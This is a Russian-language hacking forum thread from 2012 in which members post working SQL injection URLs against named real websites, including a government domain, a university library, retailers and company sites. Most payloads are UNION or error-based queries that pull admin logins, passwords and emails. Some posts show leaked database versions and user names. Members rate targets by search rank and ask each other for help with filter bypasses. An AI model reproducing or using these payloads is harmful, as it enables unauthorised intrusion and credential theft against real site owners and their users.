SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    zshda.gov.al
    Code:
    http://www.zshda.gov.al/index.php?id=11+union+select+1,concat_ws(0x3a,TABLE_NAME)+from+information_schema.tables+--+
     
  2. brain

    brain Elder - Старейшина

    Joined:
    4 Jul 2010
    Messages:
    249
    Likes Received:
    90
    Reputations:
    33
    Салон ювелирных украшений
    ТиЦ = 10
    PR = 1

    Code:
    http://www.uvelirniymir.ru/index.php?idd=-14+union+select+1,concat_ws(0x3a,LOGIN,PASS),3,4,5,6,7,8,9,10+from+kapital_zed_users--
    Админку не нашел.
     
    1 person likes this.
  3. thrust

    thrust Elder - Старейшина

    Joined:
    20 Jul 2011
    Messages:
    50
    Likes Received:
    41
    Reputations:
    31
    Code:
    http://library.au.edu/searchbooks.asp?step=step2&table=subject&title=1%27+or+1=@@version+--+
    Microsoft SQL Server 2000 - 8.00.760
    Google PR: 6
     
    1 person likes this.
  4. brain

    brain Elder - Старейшина

    Joined:
    4 Jul 2010
    Messages:
    249
    Likes Received:
    90
    Reputations:
    33
    Демократия.ру
    С барского плеча :cool:
    тИЦ = 400
    PR = 3

    индекс > 12000 страниц
    Code:
    http://www.democracy.ru/article.php?id=-3241+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--
     
    #14564 brain, 17 Jan 2012
    Last edited: 21 Jan 2012
    2 people like this.
  5. bodrich

    bodrich Member

    Joined:
    9 Jan 2012
    Messages:
    21
    Likes Received:
    7
    Reputations:
    0
    http://autotop.com.ua/top.php?cat=-1+union+select+1,2,3,4,concat_ws(0x3a,mail,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+top_users--
     
    1 person likes this.
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    http://www.bighome.ru/index.php?view=1&rieltor_id=14&sel_type=2&id=-391+UNION+SELECT+1,2,concat_ws(0xa,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95--
     
    4 people like this.
  7. Dr.Strangelove

    Joined:
    1 Dec 2008
    Messages:
    111
    Likes Received:
    61
    Reputations:
    -6
    Code:
    http://www.cirs-tm.org/researchers/researchers.php?id=-999'+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15/**
    cirstm@localhost:4.1.22-standard:cirstm_db


    PR=7



    С таблицами глухо как в танке. Кто подберет?
     
    1 person likes this.
  8. brain

    brain Elder - Старейшина

    Joined:
    4 Jul 2010
    Messages:
    249
    Likes Received:
    90
    Reputations:
    33
    PR = 2
    Code:
    http://www.tvoe-koleso.ru/price.php?id=-16+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables%20--
    // dIv спешиал фор ю ;)


    Code:
    http://villagesamphitheater.com/home.php?id=-13+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables%20--
    Музыкальный
    ТиЦ = 10
    PR = 2

    Code:
    http://notabene.od.ua/music.php?id=-42+union+select+1,table_name,3,4,5,6+from+information_schema.tables%20--
    PR = 2
    Code:
    http://www.afritonas.com/music.php?id=-6+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+admin--
     
    #14568 brain, 20 Jan 2012
    Last edited: 20 Jan 2012
  9. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    тИЦ 20 PR 4

    Sql-injection в куках.
    http://neocleous.com/
    Code:
    [B][COLOR=DarkOrange]Cookie:[/COLOR] [/B]LangCookie=en'[COLOR=Red]and(select+1+from(select+count(*),concat((select+concat(password,0x00)+from+ws_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f[/COLOR];
    5.0.27:admin_neo@localhost:webstudio_201_neo

    P.S. Довольно крупная компания в Кипре ;)
     
    2 people like this.
  10. brain

    brain Elder - Старейшина

    Joined:
    4 Jul 2010
    Messages:
    249
    Likes Received:
    90
    Reputations:
    33
    PR = 4
    Code:
    http://www.weltenklang.at/music.php?id=-78+union+select+1,2,concat_ws(0x3a,login,passwort),4,5,6,7,8,9,10+from+wkadmin--
     
  11. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    [RoA]
    Code:
    http://[COLOR=Orange]roa.hu[/COLOR]/index.php?page=blog&name=[COLOR=Red]information_schema.tables+group+by+concat(version(),0x00,rand(0)|0)+having+min(0)--+f[/COLOR]
    Code:
    Duplicate entry '[COLOR=Red]5.5.15-log[/COLOR]' for key 'group_key'
    P.S. Скулья особенная, попробуйте вместе information_schema.tables поставить другое слово(имеется ввиду не сущ. таблица) :)

    UPD. Ждем скулью
    http://prostoi-smertnyj.ru/index.php?a=1+union+select+version()--+f
    :D
     
    #14571 Ereee, 20 Jan 2012
    Last edited: 20 Jan 2012
    2 people like this.
  12. brain

    brain Elder - Старейшина

    Joined:
    4 Jul 2010
    Messages:
    249
    Likes Received:
    90
    Reputations:
    33
    PR = 4
    Code:
    http://www.tiny-lights.com/flash.php?id=-329+union+select+1,table_name,3,4,5+from+information_schema.tables--
    PR = 4
    Code:
    http://www.flashmeat.com/flash/flash.php?ID=-83+union+select+table_name,2,3,4,5,6,7,8,9+from+information_schema.tables--
    PR = 2
    Вывод в title
    Code:
    http://www.slimezone.com/flash.php?id=-70+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables--
    Code:
    http://www.triumf-obuv.ru/man.php?id=-23+union+select+1,2,3,table_name,5,6,7,8,9,10,11+from+information_schema.tables--
     
    #14572 brain, 20 Jan 2012
    Last edited: 20 Jan 2012
    2 people like this.
  13. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    MOA

    Code:
    http://www.[COLOR=Green]moa[/COLOR].by/?page=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8--+f
    4.1.22-max:moaby@localhost:moaby_MOA

    P.S. Ждем LOA, AMA, SM и A :)
     
    #14573 Ereee, 21 Jan 2012
    Last edited: 21 Jan 2012
    6 people like this.
  14. brain

    brain Elder - Старейшина

    Joined:
    4 Jul 2010
    Messages:
    249
    Likes Received:
    90
    Reputations:
    33
    PR = 1
    Code:
    http://www.sogefi.be/detail-maison.php?id=-291+union+select+1,concat_ws(0x3a,email,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+user--
    PR = 2
    Code:
    http://www.gallinagos.com/animal.php?id=-67+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user,pass),10,11+from+users--
    Code:
    http://www.lovesurfing.ru/tost.php?id=-1+union+select+1,table_name+from+information_schema.tables0--
    Code:
    http://www.capturegis.com/pages.php?id=-10+union+select+1,2,concat_ws(0x3a,username,password),4+from+ccs_admin--
     
    #14574 brain, 22 Jan 2012
    Last edited: 22 Jan 2012
  15. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    http://www.online-ul.com/stroirem/index.php?id_typ=248+/*!union+select*/+1,2,3,4,5,6,/*!table_name*/,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+information_schema.tables+--+
     
  16. brain

    brain Elder - Старейшина

    Joined:
    4 Jul 2010
    Messages:
    249
    Likes Received:
    90
    Reputations:
    33
    PR = 1
    Code:
    http://www.satsanga.ru/trips/trip.php?nid=-1+union+select+1,version(),3,4,5,6,7,8,9,10%20--
    ----
    PR = 3
    Code:
    http://www.hiraethog.org.uk/content.php?nID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,adminUsername,adminPassword),10,11,12,13,14+from+adminUser0--
     
  17. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    http://www.razborka61.ru/7doska/ind.php?id_typ=8+union+select+1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3+--+
    4 ветка(
     
  18. bodrich

    bodrich Member

    Joined:
    9 Jan 2012
    Messages:
    21
    Likes Received:
    7
    Reputations:
    0
    http://www.nordiz.ru/tovar.php?tovar_id=-1+union+select+1,2,3,4,5,group_concat(0x0b,table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,group_concat(0x0b,table_name),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72+from+information_schema.tables--
     
    1 person likes this.
  19. bodrich

    bodrich Member

    Joined:
    9 Jan 2012
    Messages:
    21
    Likes Received:
    7
    Reputations:
    0
    http://www.sotovikm.ru/tovar.php?ID=18209+union+select+1
    Как здесь обходить фильтрацию пробелов я хз
     
  20. bodrich

    bodrich Member

    Joined:
    9 Jan 2012
    Messages:
    21
    Likes Received:
    7
    Reputations:
    0
    http://www.angelbaby.ru/tovar.php?ld=-1+union+select+1,2,3,4,5,6,7,8,9,group_concat(0x0b,table_name),11,12,13+from+information_schema.tables--
     
Thread Status:
Not open for further replies.